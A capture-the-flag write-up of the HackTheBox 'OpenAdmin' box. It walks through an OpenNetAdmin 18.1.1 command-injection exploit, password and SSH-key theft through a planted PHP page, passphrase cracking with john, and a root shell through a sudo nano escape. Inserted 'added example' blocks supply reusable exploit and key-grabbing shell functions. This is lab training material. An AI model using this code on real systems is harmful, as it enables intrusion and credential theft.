OpenAdmin just retired on HackTheBox. It’s an easy difficulty Linux box that needs a bit of exploitation, a lot of recon, some pivoting and a bit of GTFOBins to finish, a nice combo right? While this box is rated easy I wouldn’t recommend it for beginners since it requires a lot of recon; it’s easy to miss important information and it can be very frustrating if you are not used to it.
Tl;Dr: To get the user flag you had to exploit a Remote Code Execution vulnerability in an outdated OpenNetAdmin instance. You get a shell as www-data, from which you pivot to the jimmy user after finding his password in a database config file. From the jimmy account you pivot again to the joanna account by extracting her SSH private key with a PHP script, since the Apache web server is configured to run one virtual host as user joanna and we have write rights over its Document Root folder. Finally, as joanna we can get the user flag.
The root flag was a bit less tricky: you had to execute a shell from inside a privileged nano editor, which joanna is allowed to run as root without a password.
Alright, let’s get into it!
First things first, let’s add the box IP to the hosts file (writing to /etc/hosts needs root, hence the tee):
$ echo "10.10.10.171 openadmin.htb" | sudo tee -a /etc/hosts
and let’s start!
Let’s start with the classic nmap scan (service detection plus default scripts) to see which ports are open on the box:
$ nmap -sV -sT -sC openadmin.htb
We have the “classic” pair: a web app running on port 80 and SSH open on port 22.
http://openadmin.htb/ displays the Apache2 Ubuntu default page:
Nothing really interesting to see here… Let’s run gobuster to see if it can find some juicy files and folders:
$ gobuster dir -u "http://openadmin.htb/" -w ~/SecLists/Discovery/Web-Content/big.txt
Three uncommon folders here:
sierra is just a static demo website, nothing to do there.
music looks like this:
Oddly enough the Login button redirects to an admin interface:
The first thing that catches the eye is this big yellow message:
You are NOT on the latest release version
Your version = v18.1.1
Latest version = Unable to determine
Please DOWNLOAD the latest version.
We all know what outdated software means right :D
Selecting the “DOWNLOAD” link redirects to the software page, which is called…. OpenNetAdmin. At first I thought the name of the box would be related to an admin page being open and easily accessible, but it turns out it was more a reference to the software used.
We have the name of the software and its version (which is outdated). Let’s see if some ready-made exploits are available:
$ searchsploit opennetadmin
Bingo! Remote code execution on the exact version running here. Should be easy right?
$ wget https://www.exploit-db.com/raw/47691 -O opennetadmin-rce.sh
(Note the capital -O: it saves the download under that name, while a lowercase -o would only redirect wget’s log there and leave you with no script.)
We got a shell as www-data.
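For readers who want to understand what the downloaded script actually does rather than just run it, here is the same injection rewritten as shell functions. This is an added example, not the original post’s code and not the exploit-db script itself: the xajax parameters and the BEGIN/END markers follow the public EDB 47691 script, while the ONA path (/ona/ under the vhost) and the marker-stripping sed are this example’s assumptions. The command is smuggled into the third xajaxargs[] element after ip=>; and its output is cut back out of the HTML that OpenNetAdmin returns.

```shell
#!/usr/bin/env bash
# Added example: the OpenNetAdmin 18.1.1 injection used by EDB 47691, as
# reusable functions. Not part of the original writeup.

# Build the POST body. The injected command lands in the third xajaxargs[]
# element after "ip=>;" and is wrapped in BEGIN/END markers so its output can
# be located inside the HTML response. (%3D%3E is the URL-encoded "=>".)
ona_payload() {
    cmd="$1"
    printf 'xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%%3D%%3E;echo "BEGIN";%s;echo "END"&xajaxargs[]=ping' "$cmd"
}

# Read the HTTP response on stdin and print only what lies between the
# BEGIN and END marker lines (the markers themselves are dropped).
ona_extract() {
    sed -n '/BEGIN/,/END/p' | sed '1d;$d'
}

# Send one command to the target and print its output.
# Usage (path assumed): ona_exec http://openadmin.htb/ona/ id
ona_exec() {
    url="$1"; shift
    curl --silent --data "$(ona_payload "$*")" "$url" | ona_extract
}
```

Wrapping ona_exec in a read loop gives you the same interactive pseudo-shell as the exploit-db script; each command is a fresh HTTP request, which is why the writeup moves to a real SSH session as soon as it has credentials.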
Let’s start by enumerating users:
www-data@openadmin:/$ ls -lh /home/
Two users, and we don’t have enough rights to access either of their home folders. Let’s continue our enumeration.
One thing that often gives good results on web applications is searching for hard-coded passwords. A little grep can do that for us:
www-data@openadmin:/$ grep -ri pass . 2>/dev/null
Here is something interesting! The full config file is the following:
Let’s see if this password works for either of the two users:
$ ssh jimmy@openadmin.htb
It works with jimmy! Unfortunately there is no user flag here, but at least we get a stable shell.
Since we have database credentials, I went to check whether we could find juicy information and potentially other users’ password hashes in the database:
jimmy@openadmin:~$ mysql -u ona_sys -p
Two MD5 hashes. A quick Google search shows that 098f6bcd4621d373cade4e832627b4f6 is the hash of test and 21232f297a57a5a743894a0e4a801fc3 is the hash of admin.
Too bad, no hash for joanna here. Let’s move on to more recon.
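Pasting hashes into a search engine works for trivial ones, but the same check can be done offline against any wordlist. Here is an added example (not part of the original post) that hashes candidates with md5sum and compares them to the two values found in the ona_sys database; the three candidate words are constructed for the demonstration, and you would normally feed it a real wordlist one word per line.

```shell
#!/usr/bin/env bash
# Added example: offline dictionary check of MD5 hashes, not from the post.

# MD5 of a single word, without a trailing newline (that is how most web
# apps hash a password field).
md5_of() {
    printf '%s' "$1" | md5sum | cut -d' ' -f1
}

# Read candidate words from stdin (one per line) and print the first one
# whose MD5 equals HASH. Exit status 1 if nothing matches.
# Usage: md5_lookup HASH < wordlist.txt
md5_lookup() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')   # normalise hex case
    while IFS= read -r word; do
        if [ "$(md5_of "$word")" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done
    return 1
}

# Constructed candidate list for the two hashes from the database:
#   printf 'password\nadmin\ntest\n' | md5_lookup 098f6bcd4621d373cade4e832627b4f6
```

Spawning md5sum per word is slow for big wordlists; for anything beyond a quick sanity check, hashcat mode 0 or john with --format=raw-md5 is the right tool, but the loop shows exactly what those tools are doing.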
While looking around (still using the awesome grep) we find some interesting config files mentioning joanna:
jimmy@openadmin:/etc$ grep -ri "joanna" . 2>/dev/null
The sudoers.d one looks perfect for a privilege escalation, don’t you think? Let’s keep this in mind for later. The one that really catches my eye is the Apache config. Let’s see the full file:
It was the first time I heard about the AssignUserID directive. Even if we can easily understand that it’s meant to run the Apache process for this virtual host as joanna instead of www-data, I searched the documentation out of curiosity to learn more about it.
This directive is provided by the mpm-itk module (apache2-mpm-itk), whose documentation describes it as follows:
AssignUserID: Takes two parameters, uid and gid (or really, user name and group name; use “#<uid>” if you want to specify a raw uid); specifies what uid and gid the vhost will run as (after parsing the request etc., of course).
So, the virtual host whose document root is /var/www/internal runs as joanna. If we can find a way to execute code through the PHP in this folder (by abusing an eval or uploading a web shell, for example), then we can run commands as joanna.
To be honest, I missed this folder in my previous recon, so let’s see what’s inside now:
jimmy@openadmin:/$ ls -l /var/www/
Here is something interesting… The internal folder is owned by our current user, jimmy, meaning we can write anything we want in it. I will use the shell_exec() PHP function to try to retrieve joanna’s SSH private key.
Here is one way to do it:
Now let’s run it! (Remember Apache listens on port 52846 for this virtual host, as we can see in the internal.conf config file.)
jimmy@openadmin:/$ curl 127.0.0.1:52846/hg8.php
Note: Don’t forget to remove your PHP file so you don’t spoil it for the players after you ;)
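The whole write, fetch and clean-up step can be done in one go from jimmy’s shell. The following is an added example and not the post’s own hg8.php: the document root (/var/www/internal), the vhost port (52846) and the fact that mpm-itk runs that vhost as joanna come from the writeup, while the file name keygrab.php, the output file name and the PEM-header sanity check are this example’s choices.

```shell
#!/usr/bin/env bash
# Added example: drop a one-off PHP page into the joanna vhost, read her key
# through it, remove the page. Not the original writeup's script.

# Emit the PHP source. shell_exec() runs with the vhost's uid, i.e. joanna,
# because of the AssignUserID directive in internal.conf.
keygrab_php() {
    cat <<'EOF'
<?php
// Added example: read joanna's private key; this vhost runs as joanna.
header('Content-Type: text/plain');
echo shell_exec('cat /home/joanna/.ssh/id_rsa 2>&1');
EOF
}

# Write the page into DOCROOT, request it on PORT via loopback, save the
# body to OUT, then delete the page so nobody else stumbles on it.
# Returns non-zero if the body does not look like a PEM private key.
# Usage (on the box as jimmy): grab_key /var/www/internal 52846 joanna_id_rsa
grab_key() {
    docroot="$1"; port="$2"; out="$3"
    page="$docroot/keygrab.php"
    keygrab_php > "$page"
    curl --silent "http://127.0.0.1:$port/keygrab.php" > "$out"
    rm -f "$page"                       # clean up regardless of the result
    chmod 600 "$out"                    # ssh refuses keys that are world-readable
    head -n 1 "$out" | grep -q 'PRIVATE KEY'
}
```

The trailing check matters in practice: if the request hits the default vhost on port 80 instead of 52846, or if the key lives somewhere other than ~/.ssh/id_rsa, the "key file" will contain an HTML error page or a cat error message rather than a key, and ssh -i will fail with a confusing message later.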
We can now use joanna’s SSH private key to log in to her account:
$ ssh -i joanna_id_rsa joanna@openadmin.htb
No luck! A passphrase is needed. From here we have two choices:
Either we go back to our PHP script and edit it to open a reverse shell instead of grabbing the private key.
Or we try to brute-force joanna’s private key passphrase.
I think it would be more interesting to show how to brute-force the passphrase; if we fail we can still go back and open a simple reverse shell.
I will use john to brute-force the SSH key passphrase. First convert the key into a hash john understands, then run it against a wordlist (rockyou.txt here stands for whichever wordlist you use):
$ ssh2john joanna_id_rsa > id_rsa.hash
$ john --wordlist=rockyou.txt id_rsa.hash
Great, we got it, and it’s related to ninja again. Let’s grab our flag now:
$ ssh -i joanna_id_rsa joanna@openadmin.htb
The recon phase won’t be needed here since we already got the information we need while searching around for the user flag. As a reminder:
joanna@openadmin:~$ sudo -l
A good habit for quick privilege escalation is to check GTFOBins. As a reminder:
GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.
And of course there is an entry for nano:
Note: ^R means CTRL+R, and likewise ^X means CTRL+X.
Let’s give it a try!
joanna@openadmin:~$ sudo /bin/nano /opt/priv
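Checking `sudo -l` output against GTFOBins by hand is fine for one box, but it is worth having a small helper for it. Below is an added example, not from the post: it pulls the NOPASSWD commands out of `sudo -l` output, flags binaries that have a well-known GTFOBins sudo entry, and carries the nano escape itself in the comments. The sudo -l sample it ships with is constructed to match what the writeup shows for joanna (the /bin/nano /opt/priv entry), and the list of known binaries is a short hand-picked subset of GTFOBins, not the full site.

```shell
#!/usr/bin/env bash
# Added example: triage `sudo -l` output for GTFOBins candidates. Not part
# of the original writeup.

# Print one NOPASSWD command per line, stripped of the "(ALL) NOPASSWD:" prefix.
# Usage: sudo -l 2>/dev/null | nopasswd_cmds
nopasswd_cmds() {
    sed -n 's/.*NOPASSWD:[[:space:]]*//p'
}

# For each NOPASSWD command print "binary<TAB>gtfobins" when the binary's
# basename is in the (hand-picked) list of GTFOBins sudo entries, else
# "binary<TAB>-". Arguments after the binary are ignored: for nano the
# file name does not matter, the escape works from inside the editor.
nopasswd_gtfo() {
    known=' nano vi vim less more man awk find env '
    nopasswd_cmds | while IFS= read -r line; do
        bin=$(printf '%s' "$line" | awk '{print $1}')
        name=${bin##*/}
        case "$known" in
            *" $name "*) printf '%s\tgtfobins\n' "$bin" ;;
            *)           printf '%s\t-\n' "$bin" ;;
        esac
    done
}

# GTFOBins "sudo" technique for nano, the one used against /opt/priv above:
#   sudo /bin/nano /opt/priv
#   ^R^X                  (Read File, then Execute Command)
#   reset; sh 1>&0 2>&0   (spawn sh with stdout/stderr pointed at the tty)
# The resulting sh runs as root because sudo started nano as root.

# Constructed sample, mirroring the entry the writeup finds for joanna.
SAMPLE_SUDO_L='Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv'

# Example run: printf '%s\n' "$SAMPLE_SUDO_L" | nopasswd_gtfo
```

Anything the helper does not flag still deserves a manual look on GTFOBins; the built-in list is deliberately short, and a binary with NOPASSWD sudo rights that is not a classic editor or pager can still be abusable through its own options or the files it reads.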
As always, do not hesitate to contact me for any questions or feedback :)
See you next time!